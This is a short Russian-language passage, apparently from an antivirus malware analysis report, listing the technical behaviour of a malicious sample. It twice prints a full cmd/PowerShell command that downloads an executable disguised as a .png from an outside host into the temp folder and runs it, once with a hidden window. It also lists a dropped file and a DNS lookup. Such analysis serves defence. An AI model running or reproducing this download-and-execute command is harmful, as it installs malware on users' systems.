Техническая информация
- http://kenrie-machines.com/images/4ajflrsr9czvs7aqyqsztugvwajhshh81ja.png как %temp%\wyrarip.exe
- '<SYSTEM32>\cmd.exe' /c PowerShell (New-Object System.Net.WebClient).DownloadFile('http://kenrie-machines.com/images/4ajfLrsR9cZVs7AqYqSzTUGVwaJhsHH81Ja.png','%TMP%\wyrarip.exe');Start-process '%TMP%\wyrarip.exe';
- '%CommonProgramFiles%\Microsoft Shared\DW\DW20.EXE' -x -s 1972
- %TEMP%\1172503.cvr
- DNS ASK ke####-machines.com
- '<SYSTEM32>\cmd.exe' /c PowerShell (New-Object System.Net.WebClient).DownloadFile('http://kenrie-machines.com/images/4ajfLrsR9cZVs7AqYqSzTUGVwaJhsHH81Ja.png','%TMP%\wyrarip.exe');Start-process '%TMP%\wyrarip.exe';' (со скрытым окном)